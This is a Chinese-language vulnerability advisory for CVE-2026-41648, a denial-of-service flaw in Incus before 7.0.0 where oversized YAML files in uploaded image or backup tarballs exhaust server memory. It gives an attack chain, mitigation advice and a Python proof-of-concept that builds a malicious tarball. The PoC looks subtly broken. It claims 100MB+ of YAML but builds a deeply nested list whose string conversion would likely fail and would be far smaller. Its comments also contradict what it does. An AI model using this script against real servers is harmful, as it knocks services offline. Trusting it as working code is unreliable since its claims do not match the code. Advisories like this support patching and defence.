CVE-2026-41648 CVSS 5.0 中危

CVE-2026-41648 Incus YAML解析内存耗尽漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41648

漏洞类型

拒绝服务

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Incus

漏洞概述

Incus是一个系统容器和虚拟机管理器。在7.0.0版本之前，该软件在处理用户提供的镜像和备份tar包时，未对YAML文件的大小进行限制。攻击者可以上传精心构造的恶意文件，导致服务器加载巨大的YAML文档消耗大量内存，从而引发内存耗尽，导致服务不可用。该问题已在7.0.0版本中修复。

技术细节

该漏洞的根本原因在于Incus在处理用户提供的镜像和备份tar包时，未对解压后YAML文件的体积实施安全限制。当Incus服务端解析这些tar包内的YAML配置文件时，它会完整地将文档内容加载至内存中。攻击者利用已认证的低权限账户，可以上传一个精心构造的恶意压缩包，其中包含一个结构极其复杂或数据量巨大的YAML文件。在解析阶段，解析器会尝试分配海量的内存资源以处理该文档，从而迅速耗尽服务器的物理内存或交换空间。鉴于攻击向量通过网络且无需用户交互，这种资源耗尽攻击不仅导致Incus服务崩溃，还可能引发整个主机系统的拒绝服务，严重影响了系统可用性。

攻击链分析

STEP 1

1. 获取权限

攻击者获取Incus系统的低权限账户。

STEP 2

2. 制作恶意文件

攻击者构造一个包含超大YAML文件的tar压缩包。

STEP 3

3. 上传文件

通过Incus接口上传该恶意tar包（作为镜像或备份）。

STEP 4

4. 触发解析

Incus服务端解压并尝试解析YAML文件，未检查大小限制。

STEP 5

5. 耗尽资源

解析过程消耗大量内存，导致服务器内存耗尽，服务停止响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-41648
# This script generates a malicious tarball containing a large YAML file
# to test the memory exhaustion vulnerability in Incus.

import tarfile
import io

def generate_malicious_yaml(size_mb=10):
    # Create a large YAML structure to consume memory
    # Using a recursive list structure
    data = []
    current = data
    for _ in range(size_mb * 1000):
        current.append([])
        current = current[0]
    return str(data)

def create_exploit_tarball(filename="exploit.tar"):
    large_yaml_content = generate_malicious_yaml(100) # 100MB+ YAML content

    # Create an in-memory tarfile
    with tarfile.open(filename, "w|gz") as tar:
        # Add a file simulating an Incus backup or image metadata
        info = tarfile.TarInfo(name="metadata.yaml")
        info.size = len(large_yaml_content.encode('utf-8'))
        tar.addfile(info, io.BytesIO(large_yaml_content.encode('utf-8')))
    
    print(f"Created {filename} with large YAML payload.")

if __name__ == "__main__":
    create_exploit_tarball()

影响范围

Incus < 7.0.0

防御指南

临时缓解措施

建议立即将Incus升级至7.0.0或更高版本。如果无法立即升级，应严格限制受信任用户的上传权限，并在应用网关层面限制上传文件的大小，以减轻潜在的拒绝服务风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表